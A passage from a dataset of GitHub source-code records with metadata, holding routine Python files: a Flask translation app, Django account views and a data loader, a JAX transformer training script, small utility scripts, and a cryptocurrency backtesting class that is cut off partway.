"line_number": 97, "usage_type": "call"}, {"api_name": "src.shared.loss.bce_loss", "line_number": 100, "usage_type": "name"}, {"api_name": "src.shared.loss.sampled_softmax_loss", "line_number": 102, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 105, "usage_type": "call"}, {"api_name": "src.shared.loss.bpr_max_loss", "line_number": 105, "usage_type": "argument"}, {"api_name": "torch.concat", "line_number": 121, "usage_type": "call"}, {"api_name": "src.shared.loss.calc_loss", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 138, "usage_type": "call"}, {"api_name": "src.shared.evaluate.validate_batch_per_timestamp", "line_number": 139, "usage_type": "call"}, {"api_name": "src.shared.loss.calc_loss", "line_number": 140, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 151, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 151, "usage_type": "attribute"}, {"api_name": "torch.optim.Adagrad", "line_number": 153, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 153, "usage_type": "attribute"}]}
+{"seq_id": "30868441916", "text": "# Import flask from the Flask library\nfrom flask import Flask, render_template, request, session\nfrom flask_session import Session\n\n# Import the translation function\nfrom translate import detect, translate\n\n# Import the dpla search\nfrom dpla import dpla\n\n# Use CSV reader to read in Amazon Listings\nimport csv\n\n# Create a Flask object and pass in __name__\napp = Flask(__name__)\n\n# Configure session\napp.config[\"SESSION PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = 'filesystem'\nSession(app)\n\nDATABASE = [\n \"All\", \"Dpla\", \"Amazon Listings\", \"Europana\"\n]\n\nLANGUAGES = {\n 'ar': 'Arabic',\n 'cs': 'Czech',\n 'de': 'German',\n 'el': 'Greek',\n 'es': 'Spanish',\n 'fr': 'French',\n 'ga': 'Irish',\n 'he': 'Hebrew',\n 'it': 'Italian',\n 'ja': 'Japanese',\n 'ko': 'Korean',\n 'ms': 'Malay',\n 'ru': 'Russian',\n 'sw': 'Swahili',\n 'ur': 'Urdu',\n 'zh-CN': 'Chinese'\n}\n\n# Set the url ending, this is a root path\n@app.route('/')\ndef greet():\n return render_template(\"greet.html\")\n\n@app.route('/select')\ndef select():\n return render_template(\"select.html\", database=DATABASE)\n\n@app.route('/language')\ndef language():\n name = request.args.get(\"name\")\n database = request.args.get(\"database\")\n session[\"name\"] = name\n session[\"database\"] = database\n\n langauge = detect(name).lang\n output = []\n\n for key in LANGUAGES:\n temp = dict()\n temp['language'] = LANGUAGES[key]\n temp['text'] = translate(dest=key, string=name).text\n output.append(temp)\n\n return render_template(\"language.html\", name=name, database=database,\n langauge=langauge, output=output)\n\n@app.route('/result')\ndef result():\n name = session.get(\"name\")\n database = session.get(\"database\")\n\n dpla_data = dpla(tosearch=name)\n return render_template(\"result.html\", name=name, database=database, dpla_data=dpla_data)\n\n@app.route('/amazon')\ndef amazon():\n with open(\"images.txt\", 'r') as f:\n content_list = f.readlines()\n content_list = content_list[0].replace(\"[\", \"\").replace(\"]\",\"\").\\\n replace(\"src=\", \"\").replace('\"', '').replace(\"'\",\"\").split(\",\")\n return render_template('amazon.html', dress=content_list)\n\nif __name__ == '__main__':\n app.run()\n\n\n\n\n\n\n", "repo_name": "Towerhint/is310_final_project", "sub_path": "Project/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2269, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "flask.Flask", "line_number": 15, "usage_type": "call"}, {"api_name": "flask_session.Session", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 56, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 56, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 57, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 57, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 58, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 59, "usage_type": "name"}, {"api_name": "translate.detect", "line_number": 61, "usage_type": "call"}, {"api_name": "translate.translate", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.session.get", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 75, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 76, "usage_type": "name"}, {"api_name": "dpla.dpla", "line_number": 78, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 87, "usage_type": "call"}]}
+{"seq_id": "26460325638", "text": "#!/usr/bin/env python\nimport subprocess\nimport os\nimport io\n\n\nn = 5\nresults = []\nchecked_results = []\nmaple = float(\"4.545447652E6\")\nmin_time = float('inf')\n\nfor i in range(0, n, 1):\n result = []\n print(i)\n proc = subprocess.Popen([os.getcwd() + \"/a.out\"], stdout=subprocess.PIPE)\n for line in io.TextIOWrapper(proc.stdout, encoding=\"utf-8\"):\n result.append(line)\n res = result[0].strip()[8:]\n time = result[2].strip()[6:]\n results.append((res, time))\n\nfor el in results:\n if (abs(maple - float(el[0])) / maple) < 0.01:\n checked_results.append(el)\n time = float(el[1])\n if time < min_time:\n min_time = time\n\nprint(\"cheked results = \", checked_results)\nprint(\"min_time = \", min_time)\n", "repo_name": "KushnirDmytro/Lab2Check", "sub_path": "Labs/Petruk___Romanjuk/integral_concurrency/run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 747, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "subprocess.Popen", "line_number": 16, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 16, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 16, "usage_type": "attribute"}, {"api_name": "io.TextIOWrapper", "line_number": 17, "usage_type": "call"}]}
+{"seq_id": "36816968039", "text": "#!/usr/bin/env python3\r\nimport sys\r\nimport os\r\nimport argparse\r\nfrom collections import defaultdict\r\n\r\ndef ArgumentParser():\r\n parser = argparse.ArgumentParser(\r\n description='Statistic file number in a given directory and its subdirectories')\r\n parser.add_argument(\"--dir\",\"-d\", help='give a directory', required=True)\r\n parser.add_argument(\"--out\",\"-o\",help=\"output name\")\r\n parser.add_argument(\"--maxdepth\",\"-m\",default=999,type=int,help=\"max depth directory query\")\r\n args = parser.parse_args()\r\n return args\r\n\r\ndef DirectoryParser(path,maxdepth):\r\n out = defaultdict(lambda : 0)\r\n for root, dirs, files in os.walk(path):\r\n n_depth = len(root.split(os.sep))\r\n if n_depth > maxdepth: continue\r\n nFiles = len(files)\r\n out[root] += nFiles\r\n out[path] += nFiles\r\n print(f\"{root}\\t{nFiles}\")\r\n return out\r\n\r\ndef output(dat, file_name):\r\n with open(file_name,'w') as fh:\r\n for key in sorted(dat.keys()):\r\n fh.write(f\"{key}\\t{dat[key]}\\n\")\r\n\r\ndef main():\r\n args = ArgumentParser()\r\n \r\n data = DirectoryParser(args.dir,args.maxdepth)\r\n output(data,args.out)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n \r\n", "repo_name": "zhunshi/ztool", "sub_path": "bin/FileNumberStat.py", "file_name": "FileNumberStat.py", "file_ext": "py", "file_size_in_byte": 1213, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 8, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 17, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 18, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 19, "usage_type": "attribute"}]}
+{"seq_id": "35674100186", "text": "from data import Dataloader\nfrom model import CausalTransformer\nimport jax.numpy as jnp\nimport jax\n\nGPTConfig = {\n 'n_vocab': 66,\n 'block_size': 32,\n 'n_layer' : 3,\n 'n_head' : 8,\n 'd_model' : 768,\n 'shards': 2,\n 'devices': 4,\n 'batch_size_per_parallel': 256,\n 'ckpt_dir': 'test'}\n\n# A downside of using the more memory efficient method of embedding sharding is that it requires equal shard size across devices\n# or a 'check which device I'm on, lookup desired shard size'. For the moment - easier to just have a few empty spots for tokens.\n\nassert GPTConfig['n_vocab'] % GPTConfig['shards'] == 0\n\n\nds = Dataloader(GPTConfig)\nmodel = CausalTransformer(GPTConfig)\n\n\nx,y = ds.next_batch() # [B,T], [B,T]\n\nwith jax.experimental.maps.mesh(*model.mesh_def):\n state = model.init(jnp.array(model.key.take(GPTConfig['shards'])), x)\n\n\n\nfrom tqdm import tqdm\n\nlosses = []\nwith jax.experimental.maps.mesh(*model.mesh_def):\n steps = [t for t in range(0, 10000)]\n pbar = tqdm(steps)\n for t in pbar:\n x,y = ds.next_batch()\n loss, state = model.train(state, x,y)\n if t % 100 == 0:\n pbar.set_description(f\"Loss: {loss.mean()}\")\n losses.append(loss.mean())\n\n# Non auto-regressive sampling (works faster so you can see if it broadly making sense after 15 minutes)\nwith jax.experimental.maps.mesh(*model.mesh_def):\n x,y = ds.next_batch()\n y_pred = model.forward(state['params'], x)\n y_pred_logit = jnp.argmax(y_pred, -1)\n \n for i in range(0,100):\n print(''.join([ds.itos[c] for c in list(y_pred_logit[i])]))\n print('--------------------------')", "repo_name": "sholtodouglas/scalingExperiments", "sub_path": "minTransformerSharded/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 1636, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 45, "dataset": "github-code", "pt": "31", "api": [{"api_name": "data.Dataloader", "line_number": 23, "usage_type": "call"}, {"api_name": "model.CausalTransformer", "line_number": 24, "usage_type": "call"}, {"api_name": "jax.experimental.maps.mesh", "line_number": 29, "usage_type": "call"}, {"api_name": "jax.experimental", "line_number": 29, "usage_type": "attribute"}, {"api_name": "model.mesh_def", "line_number": 29, "usage_type": "attribute"}, {"api_name": "model.init", "line_number": 30, "usage_type": "call"}, {"api_name": "jax.numpy.array", "line_number": 30, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 30, "usage_type": "name"}, {"api_name": "model.key.take", "line_number": 30, "usage_type": "call"}, {"api_name": "model.key", "line_number": 30, "usage_type": "attribute"}, {"api_name": "jax.experimental.maps.mesh", "line_number": 37, "usage_type": "call"}, {"api_name": "jax.experimental", "line_number": 37, "usage_type": "attribute"}, {"api_name": "model.mesh_def", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 39, "usage_type": "call"}, {"api_name": "model.train", "line_number": 42, "usage_type": "call"}, {"api_name": "jax.experimental.maps.mesh", "line_number": 48, "usage_type": "call"}, {"api_name": "jax.experimental", "line_number": 48, "usage_type": "attribute"}, {"api_name": "model.mesh_def", "line_number": 48, "usage_type": "attribute"}, {"api_name": "model.forward", "line_number": 50, "usage_type": "call"}, {"api_name": "jax.numpy.argmax", "line_number": 51, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 51, "usage_type": "name"}]}
+{"seq_id": "44177596294", "text": "from .models import User\nfrom django.shortcuts import render, redirect\nfrom .forms import CustomUserCreationForm, CustomUserChangeForm\nfrom django.contrib.auth.forms import AuthenticationForm, PasswordChangeForm\nfrom django.contrib import messages\nfrom django.contrib.auth import (\n login as auth_login,\n logout as auth_logout,\n)\nfrom django.contrib.auth.decorators import login_required\nfrom articles.models import Team\nfrom django.http import JsonResponse, QueryDict\nfrom django.views.decorators.http import require_http_methods, require_POST, require_safe\n\ndef signup(request):\n teams = Team.objects.all()\n if request.method == \"POST\":\n form = CustomUserCreationForm(request.POST)\n if form.is_valid():\n user = form.save(commit=False)\n user.team = Team.objects.get(pk=int(request.POST.get(\"team\")))\n user.save()\n auth_login(request, user)\n return redirect(\"articles:index\")\n else:\n form = CustomUserCreationForm()\n context = {\n \"form\": form,\n \"teams\":teams,\n }\n return render(request, \"accounts/signup.html\", context)\n\ndef login(request):\n if request.method == \"POST\":\n form = AuthenticationForm(request, data=request.POST)\n if form.is_valid():\n auth_login(request, form.get_user())\n messages.success(request, \"로그인 되었습니다.\")\n return redirect(\"articles:index\")\n else:\n form = AuthenticationForm()\n context = {\n \"form\": form,\n }\n return render(request, \"accounts/login.html\", context)\n\n@login_required\ndef logout(request):\n auth_logout(request)\n messages.success(request, \"로그아웃 되었습니다.\")\n return redirect(\"articles:index\")\n\ndef profile(request, pk):\n user = User.objects.get(pk=pk)\n if user.team :\n team = Team.objects.get(pk=user.team_id)\n context = {\n 'team': team,\n 'request_user': user,\n 'pk': pk,\n 'username': user.username,\n 'email': user.email,\n 'name': user.last_name,\n 'nickname': user.nickname,\n }\n else :\n context = {\n 'request_user': user,\n 'pk': pk,\n 'username': user.username,\n 'email': user.email,\n 'name': user.last_name,\n 'nickname': user.nickname,\n }\n return render(request, 'accounts/profile.html', context)\n\n@require_POST\ndef follow(request, pk):\n if request.user.is_authenticated:\n user = User.objects.get(pk=pk)\n if user != request.user:\n if user.followers.filter(pk=request.user.pk).exists():\n user.followers.remove(request.user)\n is_followed = False\n else:\n user.followers.add(request.user)\n is_followed = True\n follow_user = user.followers.filter(pk=request.user.pk)\n following_user = user.followings.filter(pk=request.user.pk)\n follow_user_list = []\n following_user_list = []\n for follow in follow_user:\n follow_user_list.append({'pk': follow.pk, 'nickname': follow.nickname, 'img': follow.team.logo.url})\n for following in following_user:\n following_user_list.append({'pk': following.pk, 'username': following.username,})\n context = {\n 'is_followed': is_followed,\n 'follow_user': follow_user_list,\n 'following_user': following_user_list,\n 'followers_count': user.followers.count(),\n 'followings_count': user.followings.count(),\n }\n return JsonResponse(context)\n return redirect('accounts:profile', user.pk)\n return redirect('accounts:login')\n\n@require_POST\ndef update(request):\n teams = Team.objects.all()\n user = User.objects.get(pk=request.user.pk)\n if request.method == 'POST':\n if request.user.is_authenticated:\n form = CustomUserChangeForm(data=request.POST, instance=request.user)\n if form.is_valid():\n user = form.save(commit=False)\n user.team = Team.objects.get(pk=int(request.POST.get(\"team\")))\n user.save()\n return redirect('accounts:profile', request.user.pk)\n else:\n form = CustomUserChangeForm(instance=user)\n context = {\n 'form': form,\n \"teams\":teams,\n }\n return render(request, 'accounts/update.html', context)\n\n@login_required\ndef password(request):\n if request.method == 'POST' :\n if request.user.is_authenticated:\n form = PasswordChangeForm(request.user, request.POST)\n if form.is_valid():\n user = form.save()\n auth_login(request, user)\n return redirect('accounts:profile', request.user.pk)\n else:\n form = PasswordChangeForm(request.user)\n context = {\n 'form': form,\n }\n return render(request, 'accounts/password.html', context)\n\n@login_required\ndef delete(request):\n request.user.delete()\n auth_logout(request)\n return redirect('articles:index')", "repo_name": "kmk4162/YammyChu", "sub_path": "accounts/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 5168, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "31", "api": [{"api_name": "articles.models.Team.objects.all", "line_number": 16, "usage_type": "call"}, {"api_name": "articles.models.Team.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "articles.models.Team", "line_number": 16, "usage_type": "name"}, {"api_name": "forms.CustomUserCreationForm", "line_number": 18, "usage_type": "call"}, {"api_name": "articles.models.Team.objects.get", "line_number": 21, "usage_type": "call"}, {"api_name": "articles.models.Team.objects", "line_number": 21, "usage_type": "attribute"}, {"api_name": "articles.models.Team", "line_number": 21, "usage_type": "name"}, {"api_name": "django.contrib.auth.login", "line_number": 23, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 24, "usage_type": "call"}, {"api_name": "forms.CustomUserCreationForm", "line_number": 26, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 31, "usage_type": "call"}, {"api_name": "django.contrib.auth.forms.AuthenticationForm", "line_number": 35, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 37, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 38, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 38, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 39, "usage_type": "call"}, {"api_name": "django.contrib.auth.forms.AuthenticationForm", "line_number": 41, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 45, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 49, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 50, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 50, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 51, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 47, "usage_type": "name"}, {"api_name": "models.User.objects.get", "line_number": 54, "usage_type": "call"}, {"api_name": "models.User.objects", "line_number": 54, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 54, "usage_type": "name"}, {"api_name": "articles.models.Team.objects.get", "line_number": 56, "usage_type": "call"}, {"api_name": "articles.models.Team.objects", "line_number": 56, "usage_type": "attribute"}, {"api_name": "articles.models.Team", "line_number": 56, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 75, "usage_type": "call"}, {"api_name": "models.User.objects.get", "line_number": 80, "usage_type": "call"}, {"api_name": "models.User.objects", "line_number": 80, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 80, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 103, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 104, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 105, "usage_type": "call"}, {"api_name": "django.views.decorators.http.require_POST", "line_number": 77, "usage_type": "name"}, {"api_name": "articles.models.Team.objects.all", "line_number": 109, "usage_type": "call"}, {"api_name": "articles.models.Team.objects", "line_number": 109, "usage_type": "attribute"}, {"api_name": "articles.models.Team", "line_number": 109, "usage_type": "name"}, {"api_name": "models.User.objects.get", "line_number": 110, "usage_type": "call"}, {"api_name": "models.User.objects", "line_number": 110, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 110, "usage_type": "name"}, {"api_name": "forms.CustomUserChangeForm", "line_number": 113, "usage_type": "call"}, {"api_name": "articles.models.Team.objects.get", "line_number": 116, "usage_type": "call"}, {"api_name": "articles.models.Team.objects", "line_number": 116, "usage_type": "attribute"}, {"api_name": "articles.models.Team", "line_number": 116, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 118, "usage_type": "call"}, {"api_name": "forms.CustomUserChangeForm", "line_number": 120, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 125, "usage_type": "call"}, {"api_name": "django.views.decorators.http.require_POST", "line_number": 107, "usage_type": "name"}, {"api_name": "django.contrib.auth.forms.PasswordChangeForm", "line_number": 131, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 134, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 135, "usage_type": "call"}, {"api_name": "django.contrib.auth.forms.PasswordChangeForm", "line_number": 137, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 141, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 127, "usage_type": "name"}, {"api_name": "django.contrib.auth.logout", "line_number": 146, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 147, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 143, "usage_type": "name"}]}
+{"seq_id": "32286058637", "text": "import json\nimport sys\nfrom django.db import transaction\nfrom django.core.management.base import BaseCommand\n\nfrom catalog.models import Location, PublicPlace, SocialInfo, WorkingSchedule, PhoneContact\n\n\nclass Command(BaseCommand):\n help = 'Load datasets of ...'\n\n @transaction.atomic\n def get_data(self):\n with open('data.txt', mode='r', encoding='utf-8') as json_file:\n data = json.load(json_file)\n for obj in data:\n public_place, _isCreated = PublicPlace.objects.get_or_create(\n name=obj['name'],\n city_id=obj['city_id'],\n country_id=obj['country_id'],\n category_id=obj['category_id']\n )\n\n location, _isCreated = Location.objects.get_or_create(\n public_place=public_place,\n address=obj['address']\n )\n # social\n if obj['socials']['facebook']:\n SocialInfo.objects.get_or_create(\n public_place=public_place,\n name_social=\"Facebook\",\n link=obj['socials']['facebook']\n )\n\n if obj['socials']['facebook']:\n SocialInfo.objects.get_or_create(\n public_place=public_place,\n name_social=\"Instagram\",\n link=obj['socials']['instagram']\n )\n\n # schedule\n schedule_object = obj['schedule']\n days_names = [('Mon', 'Monday'), ('Tue', 'Tuesday'), ('Wed', 'Wednesday'), ('Thu', 'Thursday'),\n ('Fri', 'Friday'), ('Sat', 'Saturnday'), ('Sun', 'Sunday')]\n if schedule_object:\n for day_tuple_item in days_names:\n day_name_short = day_tuple_item[0]\n day_name_long = day_tuple_item[1]\n\n schedule_in_mon_from_to = schedule_object[day_name_short][0]\n schedule_in_mon_from = schedule_object[day_name_short][0][0:5]\n schedule_in_mon_to = schedule_object[day_name_short][0][8:]\n\n break_in_mon = schedule_object[day_name_short][1]\n\n if 'Без перерви' == break_in_mon:\n break_from = '00:00'\n break_to = '00:00'\n else:\n break_from = schedule_object[day_name_short][1][0:5]\n break_to = schedule_object[day_name_short][1][8:]\n\n WorkingSchedule.objects.get_or_create(\n location=location,\n day=day_name_long,\n work_time_from=schedule_in_mon_from,\n work_time_to=schedule_in_mon_to,\n break_time_from=break_from,\n break_time_to=break_to\n )\n\n # phone\n for phone in obj['phones']:\n PhoneContact.objects.get_or_create(\n location=location,\n phone=phone\n )\n\n def handle(self, *args, **options):\n self.get_data()\n self.stdout.write(self.style.SUCCESS('Script successfully finished!'))\n", "repo_name": "andreea0008/cc_server_side_python", "sub_path": "catalog/management/commands/parser.py", "file_name": "parser.py", "file_ext": "py", "file_size_in_byte": 3459, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.core.management.base.BaseCommand", "line_number": 9, "usage_type": "name"}, {"api_name": "json.load", "line_number": 15, "usage_type": "call"}, {"api_name": "catalog.models.PublicPlace.objects.get_or_create", "line_number": 17, "usage_type": "call"}, {"api_name": "catalog.models.PublicPlace.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "catalog.models.PublicPlace", "line_number": 17, "usage_type": "name"}, {"api_name": "catalog.models.Location.objects.get_or_create", "line_number": 24, "usage_type": "call"}, {"api_name": "catalog.models.Location.objects", "line_number": 24, "usage_type": "attribute"}, {"api_name": "catalog.models.Location", "line_number": 24, "usage_type": "name"}, {"api_name": "catalog.models.SocialInfo.objects.get_or_create", "line_number": 30, "usage_type": "call"}, {"api_name": "catalog.models.SocialInfo.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "catalog.models.SocialInfo", "line_number": 30, "usage_type": "name"}, {"api_name": "catalog.models.SocialInfo.objects.get_or_create", "line_number": 37, "usage_type": "call"}, {"api_name": "catalog.models.SocialInfo.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "catalog.models.SocialInfo", "line_number": 37, "usage_type": "name"}, {"api_name": "catalog.models.WorkingSchedule.objects.get_or_create", "line_number": 65, "usage_type": "call"}, {"api_name": "catalog.models.WorkingSchedule.objects", "line_number": 65, "usage_type": "attribute"}, {"api_name": "catalog.models.WorkingSchedule", "line_number": 65, "usage_type": "name"}, {"api_name": "catalog.models.PhoneContact.objects.get_or_create", "line_number": 76, "usage_type": "call"}, {"api_name": "catalog.models.PhoneContact.objects", "line_number": 76, "usage_type": "attribute"}, {"api_name": "catalog.models.PhoneContact", "line_number": 76, "usage_type": "name"}, {"api_name": "django.db.transaction.atomic", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.db.transaction", "line_number": 12, "usage_type": "name"}]}
+{"seq_id": "19415226401", "text": "# -*— coding:utf-8 -*-\r\nimport copy\r\nimport time\r\nimport datetime\r\nimport math\r\nimport random\r\nimport pandas as pd\r\nimport asyncio\r\nfrom alpha.utils import logger\r\nfrom six.moves import xrange, zip\r\nimport numpy as np\r\nimport strategies as ST\r\nfrom market.huobi import HuobiMarket\r\nfrom alpha.tasks import LoopRunTask, SingleTask\r\nfrom alpha.order import Order\r\nfrom alpha.asset import Asset\r\nfrom alpha.position import Position\r\nfrom alpha.quant import quant\r\n\r\n\r\nIS_CLOSE = False\r\n\r\n# 回测数据市场撒旦法\r\nclass HuobiTestMarket(object):\r\n def __init__(self, market_config):\r\n super().__init__()\r\n self.market_config = market_config\r\n self.market = HuobiMarket(market_config)\r\n self.trader = self.market.trader\r\n self.now_timeline = int(time.time() - (2) * 24 * 3600)\r\n # self.now_timeline = int(time.time() - 5.5 * 3600)\r\n # self.now_timeline = 1615917738\r\n\r\n self.init_timeline = self.now_timeline\r\n self.klines_data = {}\r\n self.asset_list = []\r\n self.op_time = []\r\n self.inited = False\r\n self.level = int(market_config['level'])\r\n self.face_value = self.market.face_value\r\n\r\n SingleTask.run(self.InitMarket)\r\n self.klines_idx = {}\r\n self.last_tick_time = -1\r\n self.last_minut_s = -1\r\n self.last_tick_data = dict()\r\n self.high_first = False\r\n\r\n self.position = Position()\r\n self.position.long_quantity = 0\r\n self.position.short_quantity = 0\r\n self.tot_fee = 0\r\n self.free_asset = 100\r\n self.deal_count = 0\r\n self.tot_asset = self.free_asset\r\n self.init_asset = self.free_asset\r\n\r\n self.ask1_price = 0 # 卖一价格\r\n self.bid1_price = 0 # 买一价格\r\n\r\n async def InitMarket(self):\r\n the_start_time = self.now_timeline - 6 * 3600\r\n for period, step in [('1min', 120000 - 60), ('5min', 600000 - 60 * 5), ('15min', 1800000 - 60 * 15), ]:\r\n # for period, step in [('1min', 120000 - 60)]:\r\n if period in self.klines_data:\r\n continue\r\n\r\n now_time = the_start_time\r\n self.klines_data[period] = []\r\n print(\"{} period data start inited\".format(period), end='', flush=True)\r\n\r\n while now_time + step + 1 < time.time():\r\n data = await self.market.GetKLines(period, now_time, now_time + step + 1)\r\n if not data:\r\n await asyncio.sleep(0.04)\r\n continue\r\n if self.klines_data[period] and self.klines_data[period][-1]['id'] == data[0]['id']:\r\n data.remove(data[0])\r\n self.klines_data[period].extend(data)\r\n now_time += step\r\n print(\"\\r{} period data init process: {:.2f}%\".format(period, 100 * (now_time - the_start_time) / (time.time() - the_start_time)), end='', flush=True)\r\n\r\n while 1:\r\n data = await self.market.GetKLines(period, now_time, time.time())\r\n if not data:\r\n await asyncio.sleep(0.04)\r\n continue\r\n if self.klines_data[period] and self.klines_data[period][-1]['id'] == data[0]['id']:\r\n data.remove(data[0])\r\n self.klines_data[period].extend(data)\r\n print(\"\\r{} period data init process: {:.2f}%, with {} data\".format(period, 100, len(self.klines_data[period])), flush=True)\r\n break\r\n\r\n for idx in xrange(len(self.klines_data[period])):\r\n if self.klines_data[period][idx]['id'] >= self.now_timeline:\r\n self.last_tick_data[period] = copy.copy(self.klines_data[period][idx - 1])\r\n self.klines_idx[period] = idx - 1\r\n break\r\n\r\n self.inited = True\r\n self.UpdateTick()\r\n\r\n def UpdateTick(self):\r\n if self.now_timeline >= time.time():\r\n self.CalResult()\r\n quant.stop()\r\n ST.IS_CLOSE = True\r\n return\r\n if self.now_timeline == self.init_timeline:\r\n print(\"\\nhuobi test process: %.1f%%\" % (0, ), end='', flush=True)\r\n\r\n if self.last_tick_time != ST.strategies.tick_count:\r\n # 每次测试tick的更新时间\r\n # self.now_timeline += 60\r\n COUNT = 3\r\n self.last_minut_s += 1\r\n if self.last_minut_s >= COUNT:\r\n self.last_minut_s = 0\r\n self.now_timeline += 60 - COUNT + 1\r\n self.high_first = random.choice([True, False])\r\n\r\n self.last_tick_time = ST.strategies.tick_count\r\n f = 100 * (self.now_timeline - self.init_timeline) / (time.time() - self.init_timeline)\r\n print(\"\\rhuobi test process: %.1f%%\" % (f, ), end='', flush=True)\r\n\r\n for period in self.klines_idx:\r\n for idx in xrange(self.klines_idx[period] - 1, len(self.klines_data[period])):\r\n if self.klines_data[period][idx]['id'] >= self.now_timeline:\r\n if idx - 1 != self.klines_idx[period]:\r\n self.klines_data[period][self.klines_idx[period]] = self.last_tick_data[period]\r\n self.klines_idx[period] = idx - 1\r\n self.last_tick_data[period] = copy.copy(self.klines_data[period][idx - 1])\r\n d = self.klines_data[period][idx - 1]\r\n d['close'] = d['high'] = d['low'] = d['open']\r\n break\r\n\r\n min_data = self.last_tick_data['1min']\r\n if self.last_minut_s == 0:\r\n price = min_data['open']\r\n elif self.last_minut_s == COUNT - 1:\r\n price = min_data['close']\r\n elif self.last_minut_s == COUNT - 2:\r\n price = min_data['high'] if self.high_first else min_data['low']\r\n elif self.last_minut_s == COUNT - 3:\r\n price = min_data['low'] if self.high_first else min_data['high']\r\n else:\r\n price = random.uniform(min_data['low'], min_data['high'])\r\n # price = random.uniform(min_data['low'], min_data['high'])\r\n\r\n for period in self.klines_idx:\r\n d = self.klines_data[period][self.klines_idx[period]]\r\n if price > d['high']:\r\n d['high'] = price\r\n if price < d['low']:\r\n d['low'] = price\r\n d['close'] = price\r\n\r\n self.ask1_price = price # 卖一价格\r\n self.bid1_price = price - 0.001 # 买一价格\r\n\r\n self.UpdateTotAsset()\r\n if self.last_minut_s == COUNT - 1:\r\n dateArray = datetime.datetime.fromtimestamp(self.now_timeline)\r\n otherStyleTime = dateArray.strftime(\"%Y-%m-%d %H:%M:%S\")\r\n self.asset_list.append({'asset': self.tot_asset,\r\n 'price': price,\r\n 'time': otherStyleTime,\r\n 'op': self.op_time,})\r\n self.op_time = []\r\n\r\n async def GerOrders(self):\r\n pass\r\n\r\n async def 